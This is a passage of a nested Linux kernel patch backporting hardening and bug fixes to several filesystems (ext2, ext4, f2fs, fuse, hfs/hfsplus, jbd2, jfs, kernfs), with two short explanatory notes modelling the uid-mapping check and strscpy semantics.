++	    (CEPH_MAX_WRITE_SIZE >> PAGE_SHIFT) * sizeof(struct page *));
+ 	if (!ceph_wb_pagevec_pool)
+ 		goto bad_pagevec_pool;
+ 
+diff --git a/fs/ext2/balloc.c b/fs/ext2/balloc.c
+index 5dc0a31f4a087..d2eb4d291985e 100644
+--- a/fs/ext2/balloc.c
++++ b/fs/ext2/balloc.c
+@@ -79,26 +79,33 @@ static int ext2_valid_block_bitmap(struct super_block *sb,
+ 	ext2_grpblk_t next_zero_bit;
+ 	ext2_fsblk_t bitmap_blk;
+ 	ext2_fsblk_t group_first_block;
++	ext2_grpblk_t max_bit;
+ 
+ 	group_first_block = ext2_group_first_block_no(sb, block_group);
++	max_bit = ext2_group_last_block_no(sb, block_group) - group_first_block;
+ 
+ 	/* check whether block bitmap block number is set */
+ 	bitmap_blk = le32_to_cpu(desc->bg_block_bitmap);
+ 	offset = bitmap_blk - group_first_block;
+-	if (!ext2_test_bit(offset, bh->b_data))
++	if (offset < 0 || offset > max_bit ||
++	    !ext2_test_bit(offset, bh->b_data))
+ 		/* bad block bitmap */
+ 		goto err_out;
+ 
+ 	/* check whether the inode bitmap block number is set */
+ 	bitmap_blk = le32_to_cpu(desc->bg_inode_bitmap);
+ 	offset = bitmap_blk - group_first_block;
+-	if (!ext2_test_bit(offset, bh->b_data))
++	if (offset < 0 || offset > max_bit ||
++	    !ext2_test_bit(offset, bh->b_data))
+ 		/* bad block bitmap */
+ 		goto err_out;
+ 
+ 	/* check whether the inode table block number is set */
+ 	bitmap_blk = le32_to_cpu(desc->bg_inode_table);
+ 	offset = bitmap_blk - group_first_block;
++	if (offset < 0 || offset > max_bit ||
++	    offset + EXT2_SB(sb)->s_itb_per_group - 1 > max_bit)
++		goto err_out;
+ 	next_zero_bit = ext2_find_next_zero_bit(bh->b_data,
+ 				offset + EXT2_SB(sb)->s_itb_per_group,
+ 				offset);
+diff --git a/fs/ext4/extents_status.c b/fs/ext4/extents_status.c
+index 470d29fb407a5..9766d3b21ca2e 100644
+--- a/fs/ext4/extents_status.c
++++ b/fs/ext4/extents_status.c
+@@ -312,6 +312,8 @@ void ext4_es_find_extent_range(struct inode *inode,
+ 			       ext4_lblk_t lblk, ext4_lblk_t end,
+ 			       struct extent_status *es)
+ {
++	es->es_lblk = es->es_len = es->es_pblk = 0;
++
+ 	if (EXT4_SB(inode->i_sb)->s_mount_state & EXT4_FC_REPLAY)
+ 		return;
+ 
+diff --git a/fs/ext4/fast_commit.c b/fs/ext4/fast_commit.c
+index 1110bfa0a5b73..19353a2f44bb3 100644
+--- a/fs/ext4/fast_commit.c
++++ b/fs/ext4/fast_commit.c
+@@ -649,6 +649,12 @@ void ext4_fc_track_range(handle_t *handle, struct inode *inode, ext4_lblk_t star
+ 	if (ext4_test_mount_flag(inode->i_sb, EXT4_MF_FC_INELIGIBLE))
+ 		return;
+ 
++	if (ext4_has_inline_data(inode)) {
++		ext4_fc_mark_ineligible(inode->i_sb, EXT4_FC_REASON_XATTR,
++					handle);
++		return;
++	}
++
+ 	args.start = start;
+ 	args.end = end;
+ 
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index 8b13832238484..173f46fa10687 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -151,10 +151,11 @@ static struct buffer_head *__ext4_read_dirblock(struct inode *inode,
+ 
+ 		return bh;
+ 	}
+-	if (!bh && (type == INDEX || type == DIRENT_HTREE)) {
++	/* The first directory block must not be a hole. */
++	if (!bh && (type == INDEX || type == DIRENT_HTREE || block == 0)) {
+ 		ext4_error_inode(inode, func, line, block,
+-				 "Directory hole found for htree %s block",
+-				 (type == INDEX) ? "index" : "leaf");
++				 "Directory hole found for htree %s block %u",
++				 (type == INDEX) ? "index" : "leaf", block);
+ 		return ERR_PTR(-EFSCORRUPTED);
+ 	}
+ 	if (!bh)
+@@ -2218,6 +2219,52 @@ static int add_dirent_to_buf(handle_t *handle, struct ext4_filename *fname,
+ 	return err ? err : err2;
+ }
+ 
++static bool ext4_check_dx_root(struct inode *dir, struct dx_root *root)
++{
++	struct fake_dirent *fde;
++	const char *error_msg;
++	unsigned int rlen;
++	unsigned int blocksize = dir->i_sb->s_blocksize;
++	char *blockend = (char *)root + dir->i_sb->s_blocksize;
++
++	fde = &root->dot;
++	if (unlikely(fde->name_len != 1)) {
++		error_msg = "invalid name_len for '.'";
++		goto corrupted;
++	}
++	if (unlikely(strncmp(root->dot_name, ".", fde->name_len))) {
++		error_msg = "invalid name for '.'";
++		goto corrupted;
++	}
++	rlen = ext4_rec_len_from_disk(fde->rec_len, blocksize);
++	if (unlikely((char *)fde + rlen >= blockend)) {
++		error_msg = "invalid rec_len for '.'";
++		goto corrupted;
++	}
++
++	fde = &root->dotdot;
++	if (unlikely(fde->name_len != 2)) {
++		error_msg = "invalid name_len for '..'";
++		goto corrupted;
++	}
++	if (unlikely(strncmp(root->dotdot_name, "..", fde->name_len))) {
++		error_msg = "invalid name for '..'";
++		goto corrupted;
++	}
++	rlen = ext4_rec_len_from_disk(fde->rec_len, blocksize);
++	if (unlikely((char *)fde + rlen >= blockend)) {
++		error_msg = "invalid rec_len for '..'";
++		goto corrupted;
++	}
++
++	return true;
++
++corrupted:
++	EXT4_ERROR_INODE(dir, "Corrupt dir, %s, running e2fsck is recommended",
++			 error_msg);
++	return false;
++}
++
+ /*
+  * This converts a one block unindexed directory to a 3 block indexed
+  * directory, and adds the dentry to the indexed directory.
+@@ -2252,17 +2299,17 @@ static int make_indexed_dir(handle_t *handle, struct ext4_filename *fname,
+ 		brelse(bh);
+ 		return retval;
+ 	}
++
+ 	root = (struct dx_root *) bh->b_data;
++	if (!ext4_check_dx_root(dir, root)) {
++		brelse(bh);
++		return -EFSCORRUPTED;
++	}
+ 
+ 	/* The 0th block becomes the root, move the dirents out */
+ 	fde = &root->dotdot;
+ 	de = (struct ext4_dir_entry_2 *)((char *)fde +
+ 		ext4_rec_len_from_disk(fde->rec_len, blocksize));
+-	if ((char *) de >= (((char *) root) + blocksize)) {
+-		EXT4_ERROR_INODE(dir, "invalid rec_len for '..'");
+-		brelse(bh);
+-		return -EFSCORRUPTED;
+-	}
+ 	len = ((char *) root) + (blocksize - csum_size) - (char *) de;
+ 
+ 	/* Allocate new block for the 0th block's dirents */
+@@ -3087,10 +3134,7 @@ bool ext4_empty_dir(struct inode *inode)
+ 		EXT4_ERROR_INODE(inode, "invalid size");
+ 		return false;
+ 	}
+-	/* The first directory block must not be a hole,
+-	 * so treat it as DIRENT_HTREE
+-	 */
+-	bh = ext4_read_dirblock(inode, 0, DIRENT_HTREE);
++	bh = ext4_read_dirblock(inode, 0, EITHER);
+ 	if (IS_ERR(bh))
+ 		return false;
+ 
+@@ -3534,10 +3578,7 @@ static struct buffer_head *ext4_get_first_dir_block(handle_t *handle,
+ 		struct ext4_dir_entry_2 *de;
+ 		unsigned int offset;
+ 
+-		/* The first directory block must not be a hole, so
+-		 * treat it as DIRENT_HTREE
+-		 */
+-		bh = ext4_read_dirblock(inode, 0, DIRENT_HTREE);
++		bh = ext4_read_dirblock(inode, 0, EITHER);
+ 		if (IS_ERR(bh)) {
+ 			*retval = PTR_ERR(bh);
+ 			return NULL;
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index 28d00ed833db4..f0a45d3ec4ebb 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -1384,6 +1384,12 @@ static int ext4_xattr_inode_write(handle_t *handle, struct inode *ea_inode,
+ 			goto out;
+ 
+ 		memcpy(bh->b_data, buf, csize);
++		/*
++		 * Zero out block tail to avoid writing uninitialized memory
++		 * to disk.
++		 */
++		if (csize < blocksize)
++			memset(bh->b_data + csize, 0, blocksize - csize);
+ 		set_buffer_uptodate(bh);
+ 		ext4_handle_dirty_metadata(handle, ea_inode, bh);
+ 
+diff --git a/fs/f2fs/checkpoint.c b/fs/f2fs/checkpoint.c
+index 13d8774706758..ad4073cde397b 100644
+--- a/fs/f2fs/checkpoint.c
++++ b/fs/f2fs/checkpoint.c
+@@ -1178,6 +1178,11 @@ static void __prepare_cp_block(struct f2fs_sb_info *sbi)
+ 	ckpt->valid_node_count = cpu_to_le32(valid_node_count(sbi));
+ 	ckpt->valid_inode_count = cpu_to_le32(valid_inode_count(sbi));
+ 	ckpt->next_free_nid = cpu_to_le32(last_nid);
++
++	/* update user_block_counts */
++	sbi->last_valid_block_count = sbi->total_valid_block_count;
++	percpu_counter_set(&sbi->alloc_valid_block_count, 0);
++	percpu_counter_set(&sbi->rf_node_block_count, 0);
+ }
+ 
+ static bool __need_flush_quota(struct f2fs_sb_info *sbi)
+@@ -1569,11 +1574,6 @@ static int do_checkpoint(struct f2fs_sb_info *sbi, struct cp_control *cpc)
+ 		start_blk += NR_CURSEG_NODE_TYPE;
+ 	}
+ 
+-	/* update user_block_counts */
+-	sbi->last_valid_block_count = sbi->total_valid_block_count;
+-	percpu_counter_set(&sbi->alloc_valid_block_count, 0);
+-	percpu_counter_set(&sbi->rf_node_block_count, 0);
+-
+ 	/* Here, we have one bio having CP pack except cp pack 2 page */
+ 	f2fs_sync_meta_pages(sbi, META, LONG_MAX, FS_CP_META_IO);
+ 	/* Wait for all dirty meta pages to be submitted for IO */
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index 1d73582d1f63d..c6fb179f9d4af 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -812,6 +812,8 @@ static bool f2fs_force_buffered_io(struct inode *inode, int rw)
+ 		return true;
+ 	if (f2fs_compressed_file(inode))
+ 		return true;
++	if (f2fs_has_inline_data(inode))
++		return true;
+ 
+ 	/* disallow direct IO if any of devices has unaligned blksize */
+ 	if (f2fs_is_multi_device(sbi) && !sbi->aligned_blksize)
+diff --git a/fs/f2fs/inline.c b/fs/f2fs/inline.c
+index 8747eec3d0a34..7a2fb9789e5ee 100644
+--- a/fs/f2fs/inline.c
++++ b/fs/f2fs/inline.c
+@@ -204,8 +204,10 @@ int f2fs_convert_inline_inode(struct inode *inode)
+ 	struct page *ipage, *page;
+ 	int err = 0;
+ 
+-	if (!f2fs_has_inline_data(inode) ||
+-			f2fs_hw_is_readonly(sbi) || f2fs_readonly(sbi->sb))
++	if (f2fs_hw_is_readonly(sbi) || f2fs_readonly(sbi->sb))
++		return -EROFS;
++
++	if (!f2fs_has_inline_data(inode))
+ 		return 0;
+ 
+ 	err = f2fs_dquot_initialize(inode);
+diff --git a/fs/f2fs/inode.c b/fs/f2fs/inode.c
+index 35b1c672644ee..ff4a4e92a40c7 100644
+--- a/fs/f2fs/inode.c
++++ b/fs/f2fs/inode.c
+@@ -27,6 +27,9 @@ void f2fs_mark_inode_dirty_sync(struct inode *inode, bool sync)
+ 	if (is_inode_flag_set(inode, FI_NEW_INODE))
+ 		return;
+ 
++	if (f2fs_readonly(F2FS_I_SB(inode)->sb))
++		return;
++
+ 	if (f2fs_inode_dirtied(inode, sync))
+ 		return;
+ 
+diff --git a/fs/f2fs/segment.h b/fs/f2fs/segment.h
+index aa9ad85e0901d..17d1723d98a0b 100644
+--- a/fs/f2fs/segment.h
++++ b/fs/f2fs/segment.h
+@@ -373,7 +373,8 @@ static inline unsigned int get_ckpt_valid_blocks(struct f2fs_sb_info *sbi,
+ 				unsigned int segno, bool use_section)
+ {
+ 	if (use_section && __is_large_section(sbi)) {
+-		unsigned int start_segno = START_SEGNO(segno);
++		unsigned int secno = GET_SEC_FROM_SEG(sbi, segno);
++		unsigned int start_segno = GET_SEG_FROM_SEC(sbi, secno);
+ 		unsigned int blocks = 0;
+ 		int i;
+ 
+diff --git a/fs/fuse/inode.c b/fs/fuse/inode.c
+index 367e3b276092f..f19bdd7cbd779 100644
+--- a/fs/fuse/inode.c
++++ b/fs/fuse/inode.c
+@@ -724,6 +724,8 @@ static int fuse_parse_param(struct fs_context *fsc, struct fs_parameter *param)
+ 	struct fs_parse_result result;
+ 	struct fuse_fs_context *ctx = fsc->fs_private;
+ 	int opt;
++	kuid_t kuid;
++	kgid_t kgid;
+ 
+ 	if (fsc->purpose == FS_CONTEXT_FOR_RECONFIGURE) {
+ 		/*
+@@ -768,16 +770,30 @@ static int fuse_parse_param(struct fs_context *fsc, struct fs_parameter *param)
+ 		break;
+ 
+ 	case OPT_USER_ID:
+-		ctx->user_id = make_kuid(fsc->user_ns, result.uint_32);
+-		if (!uid_valid(ctx->user_id))
++		kuid = make_kuid(fsc->user_ns, result.uint_32);
++		if (!uid_valid(kuid))
+ 			return invalfc(fsc, "Invalid user_id");
++		/*
++		 * The requested uid must be representable in the
++		 * filesystem's idmapping.
++		 */
++		if (!kuid_has_mapping(fsc->user_ns, kuid))
++			return invalfc(fsc, "Invalid user_id");
++		ctx->user_id = kuid;
+ 		ctx->user_id_present = true;
+ 		break;
+ 
+ 	case OPT_GROUP_ID:
+-		ctx->group_id = make_kgid(fsc->user_ns, result.uint_32);
+-		if (!gid_valid(ctx->group_id))
++		kgid = make_kgid(fsc->user_ns, result.uint_32);
++		if (!gid_valid(kgid))
++			return invalfc(fsc, "Invalid group_id");
++		/*
++		 * The requested gid must be representable in the
++		 * filesystem's idmapping.
++		 */
++		if (!kgid_has_mapping(fsc->user_ns, kgid))
+ 			return invalfc(fsc, "Invalid group_id");
++		ctx->group_id = kgid;
+ 		ctx->group_id_present = true;
+ 		break;
+ 
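The two-step check added above first translates the raw option value into a kernel id and then verifies that the id is representable in the filesystem's idmapping. A minimal userspace model of the second step (illustrative only; the single-extent mapping and id_has_mapping() are assumptions here, whereas the kernel's kuid_has_mapping() walks the extents of a struct user_namespace):

#include <stdbool.h>
#include <stdio.h>

struct id_extent { unsigned int first; unsigned int count; };

static bool id_has_mapping(const struct id_extent *map, unsigned int id)
{
	return id >= map->first && id - map->first < map->count;
}

int main(void)
{
	/* e.g. a container namespace owning uids 100000..165535 */
	struct id_extent ns = { .first = 100000, .count = 65536 };

	printf("%d\n", id_has_mapping(&ns, 100001)); /* 1: representable */
	printf("%d\n", id_has_mapping(&ns, 0));      /* 0: rejected, like invalfc() */
	return 0;
}
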
+diff --git a/fs/hfs/inode.c b/fs/hfs/inode.c
+index 80d17c520d0ba..aedb4b2621891 100644
+--- a/fs/hfs/inode.c
++++ b/fs/hfs/inode.c
+@@ -204,6 +204,7 @@ struct inode *hfs_new_inode(struct inode *dir, const struct qstr *name, umode_t
+ 	HFS_I(inode)->flags = 0;
+ 	HFS_I(inode)->rsrc_inode = NULL;
+ 	HFS_I(inode)->fs_blocks = 0;
++	HFS_I(inode)->tz_secondswest = sys_tz.tz_minuteswest * 60;
+ 	if (S_ISDIR(mode)) {
+ 		inode->i_size = 2;
+ 		HFS_SB(sb)->folder_count++;
+@@ -279,6 +280,8 @@ void hfs_inode_read_fork(struct inode *inode, struct hfs_extent *ext,
+ 	for (count = 0, i = 0; i < 3; i++)
+ 		count += be16_to_cpu(ext[i].count);
+ 	HFS_I(inode)->first_blocks = count;
++	HFS_I(inode)->cached_start = 0;
++	HFS_I(inode)->cached_blocks = 0;
+ 
+ 	inode->i_size = HFS_I(inode)->phys_size = log_size;
+ 	HFS_I(inode)->fs_blocks = (log_size + sb->s_blocksize - 1) >> sb->s_blocksize_bits;
+diff --git a/fs/hfsplus/bfind.c b/fs/hfsplus/bfind.c
+index ca2ba8c9f82ef..901e83d65d202 100644
+--- a/fs/hfsplus/bfind.c
++++ b/fs/hfsplus/bfind.c
+@@ -25,19 +25,8 @@ int hfs_find_init(struct hfs_btree *tree, struct hfs_find_data *fd)
+ 	fd->key = ptr + tree->max_key_len + 2;
+ 	hfs_dbg(BNODE_REFS, "find_init: %d (%p)\n",
+ 		tree->cnid, __builtin_return_address(0));
+-	switch (tree->cnid) {
+-	case HFSPLUS_CAT_CNID:
+-		mutex_lock_nested(&tree->tree_lock, CATALOG_BTREE_MUTEX);
+-		break;
+-	case HFSPLUS_EXT_CNID:
+-		mutex_lock_nested(&tree->tree_lock, EXTENTS_BTREE_MUTEX);
+-		break;
+-	case HFSPLUS_ATTR_CNID:
+-		mutex_lock_nested(&tree->tree_lock, ATTR_BTREE_MUTEX);
+-		break;
+-	default:
+-		BUG();
+-	}
++	mutex_lock_nested(&tree->tree_lock,
++			hfsplus_btree_lock_class(tree));
+ 	return 0;
+ }
+ 
+diff --git a/fs/hfsplus/extents.c b/fs/hfsplus/extents.c
+index 721f779b4ec3e..91354e769642f 100644
+--- a/fs/hfsplus/extents.c
++++ b/fs/hfsplus/extents.c
+@@ -430,7 +430,8 @@ int hfsplus_free_fork(struct super_block *sb, u32 cnid,
+ 		hfsplus_free_extents(sb, ext_entry, total_blocks - start,
+ 				     total_blocks);
+ 		total_blocks = start;
+-		mutex_lock(&fd.tree->tree_lock);
++		mutex_lock_nested(&fd.tree->tree_lock,
++			hfsplus_btree_lock_class(fd.tree));
+ 	} while (total_blocks > blocks);
+ 	hfs_find_exit(&fd);
+ 
+@@ -592,7 +593,8 @@ void hfsplus_file_truncate(struct inode *inode)
+ 					     alloc_cnt, alloc_cnt - blk_cnt);
+ 			hfsplus_dump_extent(hip->first_extents);
+ 			hip->first_blocks = blk_cnt;
+-			mutex_lock(&fd.tree->tree_lock);
++			mutex_lock_nested(&fd.tree->tree_lock,
++				hfsplus_btree_lock_class(fd.tree));
+ 			break;
+ 		}
+ 		res = __hfsplus_ext_cache_extent(&fd, inode, alloc_cnt);
+@@ -606,7 +608,8 @@ void hfsplus_file_truncate(struct inode *inode)
+ 		hfsplus_free_extents(sb, hip->cached_extents,
+ 				     alloc_cnt - start, alloc_cnt - blk_cnt);
+ 		hfsplus_dump_extent(hip->cached_extents);
+-		mutex_lock(&fd.tree->tree_lock);
++		mutex_lock_nested(&fd.tree->tree_lock,
++				hfsplus_btree_lock_class(fd.tree));
+ 		if (blk_cnt > start) {
+ 			hip->extent_state |= HFSPLUS_EXT_DIRTY;
+ 			break;
+diff --git a/fs/hfsplus/hfsplus_fs.h b/fs/hfsplus/hfsplus_fs.h
+index 6aa919e594834..7db213cd1eea8 100644
+--- a/fs/hfsplus/hfsplus_fs.h
++++ b/fs/hfsplus/hfsplus_fs.h
+@@ -552,6 +552,27 @@ static inline __be32 __hfsp_ut2mt(time64_t ut)
+ 	return cpu_to_be32(lower_32_bits(ut) + HFSPLUS_UTC_OFFSET);
+ }
+ 
++static inline enum hfsplus_btree_mutex_classes
++hfsplus_btree_lock_class(struct hfs_btree *tree)
++{
++	enum hfsplus_btree_mutex_classes class;
++
++	switch (tree->cnid) {
++	case HFSPLUS_CAT_CNID:
++		class = CATALOG_BTREE_MUTEX;
++		break;
++	case HFSPLUS_EXT_CNID:
++		class = EXTENTS_BTREE_MUTEX;
++		break;
++	case HFSPLUS_ATTR_CNID:
++		class = ATTR_BTREE_MUTEX;
++		break;
++	default:
++		BUG();
++	}
++	return class;
++}
++
+ /* compatibility */
+ #define hfsp_mt2ut(t)		(struct timespec64){ .tv_sec = __hfsp_mt2ut(t) }
+ #define hfsp_ut2mt(t)		__hfsp_ut2mt((t).tv_sec)
+diff --git a/fs/jbd2/commit.c b/fs/jbd2/commit.c
+index 556b259a00ba6..7b34deec8b871 100644
+--- a/fs/jbd2/commit.c
++++ b/fs/jbd2/commit.c
+@@ -801,7 +801,7 @@ void jbd2_journal_commit_transaction(journal_t *journal)
+ 		if (first_block < journal->j_tail)
+ 			freed += journal->j_last - journal->j_first;
+ 		/* Update tail only if we free significant amount of space */
+-		if (freed < jbd2_journal_get_max_txn_bufs(journal))
++		if (freed < journal->j_max_transaction_buffers)
+ 			update_tail = 0;
+ 	}
+ 	J_ASSERT(commit_transaction->t_state == T_COMMIT);
+diff --git a/fs/jbd2/journal.c b/fs/jbd2/journal.c
+index 3df45e4699f10..b136b46b63bc9 100644
+--- a/fs/jbd2/journal.c
++++ b/fs/jbd2/journal.c
+@@ -1532,6 +1532,11 @@ static void journal_fail_superblock(journal_t *journal)
+ 	journal->j_sb_buffer = NULL;
+ }
+ 
++static int jbd2_journal_get_max_txn_bufs(journal_t *journal)
++{
++	return (journal->j_total_len - journal->j_fc_wbufsize) / 4;
++}
++
+ /*
+  * Given a journal_t structure, initialise the various fields for
+  * startup of a new journaling session.  We use this both when creating
+diff --git a/fs/jfs/jfs_imap.c b/fs/jfs/jfs_imap.c
+index ac42f8ee553fc..ba6f28521360b 100644
+--- a/fs/jfs/jfs_imap.c
++++ b/fs/jfs/jfs_imap.c
+@@ -290,7 +290,7 @@ int diSync(struct inode *ipimap)
+ int diRead(struct inode *ip)
+ {
+ 	struct jfs_sb_info *sbi = JFS_SBI(ip->i_sb);
+-	int iagno, ino, extno, rc;
++	int iagno, ino, extno, rc, agno;
+ 	struct inode *ipimap;
+ 	struct dinode *dp;
+ 	struct iag *iagp;
+@@ -339,8 +339,11 @@ int diRead(struct inode *ip)
+ 
+ 	/* get the ag for the iag */
+ 	agstart = le64_to_cpu(iagp->agstart);
++	agno = BLKTOAG(agstart, JFS_SBI(ip->i_sb));
+ 
+ 	release_metapage(mp);
++	if (agno >= MAXAG || agno < 0)
++		return -EIO;
+ 
+ 	rel_inode = (ino & (INOSPERPAGE - 1));
+ 	pageno = blkno >> sbi->l2nbperpage;
+diff --git a/fs/kernfs/dir.c b/fs/kernfs/dir.c
+index a00e11ebfa775..2c74b24fc22aa 100644
+--- a/fs/kernfs/dir.c
++++ b/fs/kernfs/dir.c
+@@ -125,9 +125,9 @@ static struct kernfs_node *kernfs_common_ancestor(struct kernfs_node *a,
+  * kn_to:   /n1/n2/n3         [depth=3]
+  * result:  /../..
+  *
+- * [3] when @kn_to is NULL result will be "(null)"
++ * [3] when @kn_to is %NULL result will be "(null)"
+  *
+- * Returns the length of the full path.  If the full length is equal to or
++ * Return: the length of the constructed path.  If the path would have been
+  * greater than @buflen, @buf contains the truncated path with the trailing
+  * '\0'.  On error, -errno is returned.
+  */
+@@ -138,16 +138,17 @@ static int kernfs_path_from_node_locked(struct kernfs_node *kn_to,
+ 	struct kernfs_node *kn, *common;
+ 	const char parent_str[] = "/..";
+ 	size_t depth_from, depth_to, len = 0;
++	ssize_t copied;
+ 	int i, j;
+ 
+ 	if (!kn_to)
+-		return strlcpy(buf, "(null)", buflen);
++		return strscpy(buf, "(null)", buflen);
+ 
+ 	if (!kn_from)
+ 		kn_from = kernfs_root(kn_to)->kn;
+ 
+ 	if (kn_from == kn_to)
+-		return strlcpy(buf, "/", buflen);
++		return strscpy(buf, "/", buflen);
+ 
+ 	if (!buf)
+ 		return -EINVAL;
+@@ -161,18 +162,19 @@ static int kernfs_path_from_node_locked(struct kernfs_node *kn_to,
+ 
+ 	buf[0] = '\0';
+ 
+-	for (i = 0; i < depth_from; i++)
+-		len += strlcpy(buf + len, parent_str,
+-			       len < buflen ? buflen - len : 0);
++	for (i = 0; i < depth_from; i++) {
++		copied = strscpy(buf + len, parent_str, buflen - len);
++		if (copied < 0)
++			return copied;
++		len += copied;
++	}
+ 
+ 	/* Calculate how many bytes we need for the rest */
+ 	for (i = depth_to - 1; i >= 0; i--) {
+ 		for (kn = kn_to, j = 0; j < i; j++)
+ 			kn = kn->parent;
+-		len += strlcpy(buf + len, "/",
+-			       len < buflen ? buflen - len : 0);
+-		len += strlcpy(buf + len, kn->name,
+-			       len < buflen ? buflen - len : 0);
++
++		len += scnprintf(buf + len, buflen - len, "/%s", kn->name);
+ 	}
+ 
+ 	return len;
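The strlcpy() to strscpy() conversion above changes the overflow contract: strlcpy() returns the length it wanted to write, so truncation must be detected by comparing against the buffer size, while strscpy() returns -E2BIG on truncation, which the callers can propagate directly. A hand-rolled userspace model of the semantics (this strscpy is a local sketch, not the libc or kernel symbol):

#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

static ssize_t strscpy(char *dst, const char *src, size_t sz)
{
	size_t len = strnlen(src, sz);

	if (!sz)
		return -E2BIG;
	if (len == sz) {			/* would truncate */
		memcpy(dst, src, sz - 1);
		dst[sz - 1] = '\0';
		return -E2BIG;
	}
	memcpy(dst, src, len + 1);		/* fits, incl. NUL */
	return len;
}

int main(void)
{
	char buf[4];

	printf("%zd\n", strscpy(buf, "/a", sizeof(buf)));          /* 2 */
	printf("%zd\n", strscpy(buf, "/sys/kernel", sizeof(buf))); /* -7: -E2BIG */
	return 0;
}
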
+@@ -185,10 +187,12 @@ static int kernfs_path_from_node_locked(struct kernfs_node *kn_to,
+  * @buflen: size of @buf
+  *
+  * Copies the name of @kn into @buf of @buflen bytes.  The behavior is
+- * similar to strlcpy().  It returns the length of @kn's name and if @buf
+- * isn't long enough, it's filled upto @buflen-1 and nul terminated.
++ * similar to strlcpy().
+  *
+- * Fills buffer with "(null)" if @kn is NULL.
++ * Fills buffer with "(null)" if @kn is %NULL.
++ *
++ * Return: the length of @kn's name and if @buf isn't long enough,
++ * it's filled up to @buflen-1 and nul terminated.
+  *
+  * This function can be called from any context.
+  */
+@@ -215,7 +219,7 @@ int kernfs_name(struct kernfs_node *kn, char *buf, size_t buflen)
+  * path (which includes '..'s) as needed to reach from @from to @to is
+  * returned.
+  *
+- * Returns the length of the full path.  If the full length is equal to or
++ * Return: the length of the constructed path.  If the path would have been
+  * greater than @buflen, @buf contains the truncated path with the trailing
+  * '\0'.  On error, -errno is returned.
+  */
+@@ -266,12 +270,10 @@ void pr_cont_kernfs_path(struct kernfs_node *kn)
+ 	sz = kernfs_path_from_node(kn, NULL, kernfs_pr_cont_buf,
+ 				   sizeof(kernfs_pr_cont_buf));
+ 	if (sz < 0) {
+-		pr_cont("(error)");
+-		goto out;
+-	}
+-
+-	if (sz >= sizeof(kernfs_pr_cont_buf)) {
+-		pr_cont("(name too long)");
++		if (sz == -E2BIG)
++			pr_cont("(name too long)");
++		else
++			pr_cont("(error)");
+ 		goto out;
+ 	}
+ 
+@@ -287,6 +289,8 @@ void pr_cont_kernfs_path(struct kernfs_node *kn)
+  *
+  * Determines @kn's parent, pins and returns it.  This function can be
+  * called from any context.
++ *
++ * Return: parent node of @kn
+  */
+ struct kernfs_node *kernfs_get_parent(struct kernfs_node *kn)
+ {
+@@ -302,11 +306,11 @@ struct kernfs_node *kernfs_get_parent(struct kernfs_node *kn)
+ }
+ 
+ /**
+- *	kernfs_name_hash
++ *	kernfs_name_hash - calculate hash of @ns + @name
+  *	@name: Null terminated string to hash
+  *	@ns:   Namespace tag to hash
+  *
+- *	Returns 31 bit hash of ns + name (so it fits in an off_t )
++ *	Return: 31-bit hash of ns + name (so it fits in an off_t)
+  */
+ static unsigned int kernfs_name_hash(const char *name, const void *ns)
+ {
+@@ -354,8 +358,8 @@ static int kernfs_sd_compare(const struct kernfs_node *left,
+  *	Locking:
+  *	kernfs_rwsem held exclusive
+  *
+- *	RETURNS:
+- *	0 on susccess -EEXIST on failure.
++ *	Return:
++ *	%0 on success, -EEXIST on failure.
+  */
+ static int kernfs_link_sibling(struct kernfs_node *kn)
+ {
+@@ -394,8 +398,10 @@ static int kernfs_link_sibling(struct kernfs_node *kn)
+  *	@kn: kernfs_node of interest
+  *
+  *	Try to unlink @kn from its sibling rbtree which starts from
+- *	kn->parent->dir.children.  Returns %true if @kn was actually
+- *	removed, %false if @kn wasn't on the rbtree.
++ *	kn->parent->dir.children.
++ *
++ *	Return: %true if @kn was actually removed,
++ *	%false if @kn wasn't on the rbtree.
+  *
+  *	Locking:
+  *	kernfs_rwsem held exclusive
+@@ -419,10 +425,10 @@ static bool kernfs_unlink_sibling(struct kernfs_node *kn)
+  *	@kn: kernfs_node to get an active reference to
+  *
+  *	Get an active reference of @kn.  This function is noop if @kn
+- *	is NULL.
++ *	is %NULL.
+  *
+- *	RETURNS:
+- *	Pointer to @kn on success, NULL on failure.
++ *	Return:
++ *	Pointer to @kn on success, %NULL on failure.
+  */
+ struct kernfs_node *kernfs_get_active(struct kernfs_node *kn)
+ {
+@@ -442,7 +448,7 @@ struct kernfs_node *kernfs_get_active(struct kernfs_node *kn)
+  *	@kn: kernfs_node to put an active reference to
+  *
+  *	Put an active reference to @kn.  This function is noop if @kn
+- *	is NULL.
++ *	is %NULL.
+  */
+ void kernfs_put_active(struct kernfs_node *kn)
+ {
+@@ -464,7 +470,7 @@ void kernfs_put_active(struct kernfs_node *kn)
+  * kernfs_drain - drain kernfs_node
+  * @kn: kernfs_node to drain
+  *
+- * Drain existing usages and nuke all existing mmaps of @kn.  Mutiple
++ * Drain existing usages and nuke all existing mmaps of @kn.  Multiple
+  * removers may invoke this function concurrently on @kn and all will
+  * return after draining is complete.
+  */
+@@ -577,7 +583,7 @@ EXPORT_SYMBOL_GPL(kernfs_put);
+  * kernfs_node_from_dentry - determine kernfs_node associated with a dentry
+  * @dentry: the dentry in question
+  *
+- * Return the kernfs_node associated with @dentry.  If @dentry is not a
++ * Return: the kernfs_node associated with @dentry.  If @dentry is not a
+  * kernfs one, %NULL is returned.
+  *
+  * While the returned kernfs_node will stay accessible as long as @dentry
+@@ -698,8 +704,8 @@ struct kernfs_node *kernfs_new_node(struct kernfs_node *parent,
+  * @id's lower 32bits encode ino and upper gen.  If the gen portion is
+  * zero, all generations are matched.
+  *
+- * RETURNS:
+- * NULL on failure. Return a kernfs node with reference counter incremented
++ * Return: %NULL on failure,
++ * otherwise a kernfs node with reference counter incremented.
+  */
+ struct kernfs_node *kernfs_find_and_get_node_by_id(struct kernfs_root *root,
+ 						   u64 id)
+@@ -747,8 +753,8 @@ struct kernfs_node *kernfs_find_and_get_node_by_id(struct kernfs_root *root,
+  *	function increments nlink of the parent's inode if @kn is a
+  *	directory and link into the children list of the parent.
+  *
+- *	RETURNS:
+- *	0 on success, -EEXIST if entry with the given name already
++ *	Return:
++ *	%0 on success, -EEXIST if entry with the given name already
+  *	exists.
+  */
